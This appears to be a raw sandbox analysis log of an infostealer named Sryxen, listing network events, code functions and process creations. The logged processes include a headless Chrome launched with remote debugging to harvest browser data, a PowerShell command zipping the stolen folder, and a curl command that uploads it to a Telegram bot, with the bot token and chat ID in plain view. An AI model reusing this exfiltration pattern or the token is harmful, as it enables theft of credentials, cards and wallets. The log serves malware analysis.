Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B534870 LoadLibraryW,GetProcAddress,NtQueryInformationProcess,ReadProcessMemory,0_2_00007FF67B534870
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B4F72800_2_00007FF67B4F7280
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B5322A00_2_00007FF67B5322A0
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B60A8C00_2_00007FF67B60A8C0
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B5268000_2_00007FF67B526800
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B4C67300_2_00007FF67B4C6730
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B499D600_2_00007FF67B499D60
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B6757200_2_00007FF67B675720
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B6E8A8C0_2_00007FF67B6E8A8C
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B4D81E00_2_00007FF67B4D81E0
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B6546D00_2_00007FF67B6546D0
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B523A500_2_00007FF67B523A50
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B6C7A200_2_00007FF67B6C7A20
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B6F3EE80_2_00007FF67B6F3EE8
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B6C77C00_2_00007FF67B6C77C0
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B6B35D00_2_00007FF67B6B35D0
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B6FEC980_2_00007FF67B6FEC98
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B6F2A5C0_2_00007FF67B6F2A5C
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B6F2E6C0_2_00007FF67B6F2E6C
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B6F264C0_2_00007FF67B6F264C
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B6FE6C80_2_00007FF67B6FE6C8
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B675E700_2_00007FF67B675E70
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B6C5F000_2_00007FF67B6C5F00
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B6155300_2_00007FF67B615530
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B6518600_2_00007FF67B651860
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B6B18C00_2_00007FF67B6B18C0
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B4AD7A00_2_00007FF67B4AD7A0
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B60D5A00_2_00007FF67B60D5A0
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B60D0800_2_00007FF67B60D080
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B700EA40_2_00007FF67B700EA4
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: String function: 00007FF67B524100 appears 41 times
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: String function: 00007FF67B4C9990 appears 34 times
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: String function: 00007FF67B5F8250 appears 39 times
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: String function: 00007FF67B478F60 appears 40 times
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: String function: 00007FF67B491B80 appears 67 times
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7348 -s 856
Source: Sryxen-Built.exeStatic PE information: invalid certificate
Source: Sryxen-Built.exe, 00000000.00000002.1489431988.0000018D461F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs Sryxen-Built.exe
Source: classification engineClassification label: mal84.troj.spyw.evad.winEXE@77/364@14/20
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B522A10 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00007FF67B522A10
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67CCD620-1FB0.pmaJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9036:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7348
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9012:120:WilError_03
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile created: C:\Users\user\AppData\Local\Temp\SryxenJump to behavior
Source: Sryxen-Built.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Sryxen-Built.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Sryxen-Built.exe, 00000000.00000000.1222424319.00007FF67B723000.00000002.00000001.01000000.00000003.sdmp, Sryxen-Built.exe, 00000000.00000002.1490939539.00007FF67B723000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: Sryxen-Built.exe, 00000000.00000003.1259585485.0000018D463B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE masked_credit_cards (id VARCHAR, name_on_card VARCHAR, network VARCHAR, last_four VARCHAR, exp_month INTEGER DEFAULT 0, exp_year INTEGER DEFAULT 0, bank_name VARCHAR, nickname VARCHAR, card_issuer INTEGER DEFAULT 0, instrument_id INTEGER DEFAULT 0, virtual_card_enrollment_state INTEGER DEFAULT 0, card_art_url VARCHAR, product_description VARCHAR, card_issuer_id VARCHAR, virtual_card_enrollment_type INTEGER DEFAULT 0, product_terms_url VARCHAR, card_info_retrieval_enrollment_state INTEGER DEFAULT 0) V;F
Source: Sryxen-Built.exe, 00000000.00000000.1222424319.00007FF67B723000.00000002.00000001.01000000.00000003.sdmp, Sryxen-Built.exe, 00000000.00000002.1490939539.00007FF67B723000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: Sryxen-Built.exe, 00000000.00000003.1255943128.0000018D463B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE field_info (form_signature INTEGER NOT NULL, field_signature INTEGER NOT NULL, field_type INTEGER NOT NULL, create_time INTEGER NOT NULL, UNIQUE (form_signature, field_signature)) V;F
Source: Sryxen-Built.exe, 00000000.00000003.1255247025.0000018D463A5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1255602081.0000018D463B5000.00000004.00000020.00020000.00000000.sdmp, OyLTXQq.db.0.dr, Login Data.11.dr, kK5W5eY.db.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: unknownProcess created: C:\Users\user\Desktop\Sryxen-Built.exe "C:\Users\user\Desktop\Sryxen-Built.exe"
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=21026 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --no-pre-read-main-dll --field-trial-handle=2044,i,1239830082047831233,17937077768057829185,262144 --disable-features=PaintHolding --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2500 /prefetch:3
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=2112,i,15007962788888816563,4960252785444406782,262144 /prefetch:3
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1976,i,15755045881619873346,3621539888520313062,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6340 --field-trial-handle=1976,i,15755045881619873346,3621539888520313062,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6560 --field-trial-handle=1976,i,15755045881619873346,3621539888520313062,262144 /prefetch:8
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip"
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess created: C:\Windows\System32\curl.exe curl -F "chat_id=7129133033" -F "document=@\"C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip\"" -F "caption=DIR: Cryptowallets Games Socials VPN " https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\curl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7348 -s 856
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7000 --field-trial-handle=1976,i,15755045881619873346,3621539888520313062,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7000 --field-trial-handle=1976,i,15755045881619873346,3621539888520313062,262144 /prefetch:8
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=2092,i,268919721594276684,6312096580971565461,262144 /prefetch:3
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2052,i,6752636974988034322,17708656779778021828,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6344 --field-trial-handle=1976,i,15755045881619873346,3621539888520313062,262144 /prefetch:8
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=21026 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpuJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"Jump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip"Jump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess created: C:\Windows\System32\curl.exe curl -F "chat_id=7129133033" -F "document=@\"C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip\"" -F "caption=DIR: Cryptowallets Games Socials VPN " https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --no-pre-read-main-dll --field-trial-handle=2044,i,1239830082047831233,17937077768057829185,262144 --disable-features=PaintHolding --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2500 /prefetch:3Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=2092,i,268919721594276684,6312096580971565461,262144 /prefetch:3Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=2112,i,15007962788888816563,4960252785444406782,262144 /prefetch:3Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1976,i,15755045881619873346,3621539888520313062,262144 /prefetch:3Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6340 --field-trial-handle=1976,i,15755045881619873346,3621539888520313062,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6560 --field-trial-handle=1976,i,15755045881619873346,3621539888520313062,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7000 --field-trial-handle=1976,i,15755045881619873346,3621539888520313062,262144 /prefetch:8Jump to behavior
